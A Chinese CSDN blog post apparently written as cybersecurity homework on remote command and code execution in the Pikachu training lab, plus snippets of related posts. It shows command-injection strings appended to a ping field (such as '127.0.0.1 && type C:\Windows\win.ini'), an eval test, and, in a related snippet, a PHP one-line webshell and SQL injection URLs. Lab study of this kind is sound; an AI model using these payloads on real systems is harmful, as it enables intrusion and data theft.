我的网安作业8

最新推荐文章于 2024-09-23 10:29:24 发布

2301_76714452

最新推荐文章于 2024-09-23 10:29:24 发布

阅读量199

点赞数 2

文章标签：网络

本文链接：https://blog.csdn.net/2301_76714452/article/details/141938682

版权

RCE 远程执行漏洞

概述：在Web应用开发中为了灵活性、简洁性等会让应用调用代码执行函数或系统命令执行函数处理，若应用对用户的输入过滤不严，容易产生远程代码执行漏洞或系统命令执行漏洞；

分为远程代码执行和远程系统命令执行

pikachu靶场

1.ping

在ip地址的后门拼接说我们自己想执行的命令

127.0.0.1 & ipconfig

127.0.0.1 & whoami

127.0.0.1 && type C:\Windows\win.ini

查看win.ini文件内容

同样的可以拼接各种命令如：echo

127.0.0.1 | echo "<?php 123 ?>" >1.txt

2.eval

eval()：会将符合PHP 语法规范字符串当作php代码执行。

phpinfo();输入这个显示函数,用于显示 PHP 运行环境的配置信息

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

2301_76714452

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

我的网安作业

wwp的博客

01-31

118

一 Sqli-labs: 由于是完全的新手，所以有很多都不太了解，嗯sqli-labs我做了第一第二第三关，原理都差不多所以以第三关为例：不知道为什么我的PHPstudy启动总是有问题。于是每次都得自己手动开启MySQL的服务：好了启动成功，开始进入正题。 2021/1/31： 1.判断是否有SQL注入 http://127.0.0.1/sqli/Less-3/?id=1 http://127.0.0.1/sqli/Less-3/?id=1’ 由于两次结果的显示明显不同，因此判断存在SQL注入漏

我的网安作业2/21

wwp的博客

02-21

111

一、SQL-labs Less8 1.判断是否存在SQL注入 http://127.0.0.1/sqli/Less-8/?id=1 http://127.0.0.1/sqli/Less-8/?id=1' 由两次结果可知，存在SQL注入问题。 2.构造正确的SQL语句 http://127.0.0.1/sqli/Less-8/?id=1' --+ 3.开始猜解表名由于是布尔盲注，手动实在是太慢了，我觉得用burpsuite爆破都很麻烦，但是我自己的代码能力又很差，唉，彷佛看到了我的网安之路的终点

参与评论您还未登录，请先登录后发表或查看评论

我的网安作业5

2301_76714452的博客

09-01

711

修改密码，通过将admin闭合，之后的内容不执行，达成恒真条件，完成修改管理员密码的注入。与十一关差不多，闭合方式不同，闭合方式为：") #通过查看源码可以得知在修改密码时的闭合方式为‘#报错注入查出网站的数据库里的目标表名。报错注入查出网站的数据库里的目标表名。报错注入查出网站的数据库里的目标表名。判断闭合方式，闭合方式为：') #报错注入查出目标表中的所有列名。报错注入查出目标表中的所有列名。报错注入查出目标表中的所有列名。查出网站的数据库里的目标表名。判断闭方式，闭合方式为：" #

我的网安作业4

2301_76714452的博客

09-01

254

alert(1)

我的网安作业7

2301_76714452的博客

09-05

154

upload-labs靶场。

我的网安作业2

2301_76714452的博客

08-27

186

在这个登录界面用burpsuite代理进行拦截。选择攻击类型，配置插入位置。导出后生成表格下载表格。二.简单的表单暴力破解。

网安作业2

m0_70187377的博客

08-27

197

在插入文件功能内可以看到一个文件夹进入var/www/html路径可以看到之后访问url+/nothinghere/fl000g.txt得到flag。在url后面加/www.zip可以下载得到源文件，文件提示flag，in fl000g.txt，访问得到flag。访问url+/tz.php得到页面进入PHP参数一栏，点击phpinfo CTRL+F搜索flag。访问url+/db/db.mdb，下载文件，打开文件之后搜索flag，成功找到flag。通过在url后加/.svn访问得到flag。

网安作业1

dsahah的博客

07-12

107

接1/0/21/0/4建立需要区域办公区生产区游客区完成用户管理市场部研发部办公区-研发部办公区-市场部完成登录建立用户。

我的网安作业2/14

wwp的博客

02-14

127

一、sql-labs Less7 1.前期准备在PHPstudy下的PHPTutorial/mysql/my.ini文件里面添加一句。（为了后期支持文件的读写） 2.一句话木马在phpStudy\PHPTutorial\WWW的文件夹下新建一句话木马文本。根据后面出现的bug，正确的语句应该是： <?php @eval($_POST["a"]);?> 启动中国菜刀：连接木马：两个基本函数：load_file()读取本地文件；into outfile 写文件。 3.判断是否存在

东南大学网安学院模式识别作业答案&考试真题回忆版

02-26

这门课很简单，可以翘课，跟着PPT自学就行，但是课后作业是重中之重，考试范围的百分之九十都是从做过的作业里面变式。无论你有多摆，请认真对待这门课的作业，因为他量很少，但是很有用！期末的真题回忆的很粗糙，...

【作业复习】网安.docx

09-19

【作业复习】网安.docx

周玉川-2017221302006-网安技术第三次作业1

08-03

例如，本次作业中提到的口令检测程序就要求密码必须包含大写字母、小写字母、数字和特殊字符中的至少三种类型，并且长度限制在8到30个字符之间。 #### 实现方法该检测程序使用了JavaScript中的正则表达式来实现这...

我的网安作业2/7

wwp的博客

02-07

160

一、sqli-labs less4：打开less4的index.php文件，在SQL语句下添加如下两句： echo $sql; echo "<br>"; 1.判断是否存在注入： http://127.0.0.1/sqli/Less-4/?id=1 http://127.0.0.1/sqli/Less-4/?id=1'显式正确 http://127.0.0.1/sqli/Less-4/?id=1"显式不正确得到报错信息：根据报错信息构造正确的SQL语句： http://127.0.0

kubernetes网络(一)之calico详解

鲜少伟的博客

09-22

1156

本文介绍Kubernetes最流行的网络解决方案calico。

将sqlite3移植到开发板上

T66656的博客

09-21

799

把lib/文件夹下的libsqlite3.so.0.8.6 下载到板子目录/lib下（libsqlite3.so和libsqlite3.so.0都是libsqlite3.so.0.8.6的软链接文件）1、bin文件夹下的sqlite3，是sqlite可执行应用程序，下载到板子Linux系统下的/bin目录。有./bin/sqlite3,./include/sqlite3.h以及./lib/下的库文件。–prefix：指定安装目录，编译后生成的文件放在此目录，必须是绝对路径。执行make后，再执行。

linux网络编程5

qq_65818377的博客

09-21

857

将套接字修改为被动，让操作系统给该套接字设置一个连接队伍，用来记录所有连接到该套接字的连接。关闭使用socket函数创建的套接字，会导致服务器无法接收新的连接，但不会影响已经连接的；其是关闭一个代表已经连接套接字，则会出现向另外一端接收到一个长度为0的数据包；关闭accept返回的套接字，则会导致其连接关闭，但不会影响服务器的；backlog：连接队列的长度，即设置服务器最大的连接客服的数量。其返回的是一个已连接的套接字，这个套接字代表当前这个连接。connect建立连接后不会产生新的套接字；

7、论等保的必要性

weixin_43263566的博客

09-21

1044

目前，金融、电力、广电、医疗、教育等行业已经下发了相关文件。2007年6月发布的《信息安全等级保护管理办法》（公通字[2007]143号）规定了实施该制度的原则、内容、职责分工、基本要求和实施计划，明确了操作办法。梳理不同等级的系统后，应对其进行相应等级的安全防护建设，确保重要信息系统在遭受攻击时能够有效抵御，或在被攻击后快速恢复应用，以避免重大损失或影响。开展等级保护的最重要原因是通过测评工作，发现单位系统内外部的安全风险和脆弱性，整改后提升信息安全防护能力，降低被各种攻击的风险。

BGP相关知识笔记

最新发布

Richardlygo的博客

09-23

1200

整个网络规模扩大，路由数量进一步增加，路由表与LSDB规模变大，路由收敛变慢，设备性能消耗加大为此在AS之间专门使用BGP协议进行路由传递，相较于传统的IGP路由协议：BGP基于TCP，只要能够建立TCP连接即可建立BGP只传递路由信息，不会暴露AS内的拓扑3。

github网安项目

04-24

GitHub是一个基于Web的代码托管平台，它提供了版本控制和协作功能，让开发者可以方便地共享和管理代码。在GitHub上，有很多与网安相关的项目，这些项目致力于保护网络安全、防止黑客攻击和提高系统的安全性。以下是一些常见的GitHub网安项目： 1. OWASP（开放式Web应用程序安全项目）：OWASP是一个致力于提高Web应用程序安全性的国际组织。他们在GitHub上维护了一系列开源项目，包括安全工具、漏洞测试和安全指南等。 2. Metasploit：Metasploit是一个广泛使用的渗透测试框架，它提供了一系列工具和资源，帮助安全专家评估和增强系统的安全性。Metasploit在GitHub上有一个官方仓库，开发者可以在这里获取最新的代码和贡献自己的改进。 3. Snort：Snort是一个开源的入侵检测系统（IDS），它可以监测网络流量并检测潜在的攻击行为。Snort的代码托管在GitHub上，开发者可以参与到项目中，改进和定制自己的IDS规则。 4. Nmap：Nmap是一个网络扫描和主机发现工具，它可以帮助安全专家评估网络的安全性。Nmap的源代码也在GitHub上开放，用户可以自由地访问和贡献代码。 5. Security Shepherd：Security Shepherd是一个教育性的Web应用程序，旨在帮助开发者学习和理解常见的Web安全漏洞。它提供了一系列的挑战和实验，供用户测试和提高自己的安全技能。Security Shepherd的代码也在GitHub上开源。这些项目只是GitHub上众多网安项目的一小部分，你可以通过在GitHub上搜索关键词来找到更多与网安相关的项目。希望这些信息对你有帮助！